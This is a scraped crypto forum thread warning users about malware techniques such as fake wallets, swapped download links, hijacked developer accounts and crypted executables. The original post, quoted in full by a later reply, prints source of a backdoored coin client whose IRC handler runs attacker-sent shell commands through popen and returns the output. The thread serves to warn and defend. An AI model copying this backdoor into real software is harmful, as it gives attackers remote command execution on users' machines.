Beware of Increasingly Sophisticated Malware Infection Attempts

[Hoxysado]

I'm adding this to the list of possible scams:

https://bitcointalk.org/index.php?topic=951827.0

Thank you so much! I hope the people who committed that crime will find their punishment! and, of course, poor people who lost their money

[1715083799]

1715083799

[1715083799]

1715083799

[1715083799]

1715083799

[Tonymillions]

OMG

i can;t believe this information.
thank you guys.
i will pass the message across.

Thanks

[Miminaha]

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Thank you so much for the information I think we all must be more careful when we deal with our money- you have inspired me to review my antivirus

[Hoxysado]

I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((

yeah I can understand why you are so annoyed about it
lets hope that they will work out something soon

[bitbloq.io]

I know it can be hard to believe but nobody should be shocked. It happens and we can always increase security, but it will never be 100% secure. Think about it, if someone is smart enough to make it, then that just means there is somebody out there smarter that can break it.

[Israel712]

I really commend your effort in sensitizing forum members, I will also like a continuous update on this all important issue to save from the pains scammers intend to inflict on especially novice like us. Thanks a lot.

[dangphananh]

Bad software scare people the most, I use cash for complete security and I recommend doing so

[Seram1]

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Thank you so much for the information I think we all must be more careful when we deal with our money- you have inspired me to review my antivirus

indeed we must always be careful in maintaining our assets. because there are always thieves everywhere. if your assets are gone you can not report where to go because it will be difficult to find him. better prevent before something happens that we do not want.

[Seram1]

I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((

yeah I can understand why you are so annoyed about it
lets hope that they will work out something soon

I think the wallet created by the developers is good. All that is not perfect there must be advantages and disadvantages let alone this online system, so if you do not want to lose your assets, you also have to be careful and careful in storing your assets.

[loinguyen1984]

I am a new member, please help

[kalstarzz]

this virus has spread and will hurt many people.
if the antivirus is no longer functioning, how we can avoid the virus attack. ?

[novak hiel]

Is there still malware infection attempst? Thank you!!

[Wiliam heil]

I am newbie and thanks for informing. I would like to ask how can we spot a scammer

[yetiripper]

This year I am working on getting different wallets and a separate apple so that all the extra programms that I use do not counteract with the system operation itself.

[edison benzamin]

I led a large number of bounty, recorded everything on a flash drive, all tables, all the links, and what do you think? All burned, all my work, all I did for weeks. I'm tired of this, really it is impossible to fight?

[ProfessorZ]

I recommend engraving the mnemonic phrase on a stainless steel plate (both fire and water-proof, high corrosion resistance) and burry it in a safe location; a very good method to hold longer than you have planned your coins; better than an air-gapped computer and 100% hack-proof.

[omareckmac]

Nothing changes - the usual wallet is always interesting to thieves, and electronic - to various kinds of scammers. For reliable storage of electronic coins, it is better to start a so-called cool wallet on a computer that is not normally connected to the network.

[Crypto11021]

If you can post the coins name it will be better

[ProfessorZ]

If you tought air-gapped devices are safe, read this: https://arstechnica.com/information-technology/2018/04/new-hacks-siphon-private-cryptocurrency-keys-from-airgapped-wallets/

Sounds to me like Person of interest, but still feasible in some ideal conditions.

[Negdan4ik]

I think we should be very careful about the infestations.Thank you very much for the overview and useful information, I Think that this site is very useful for scammers who want easy money. Forewarned is forearmed.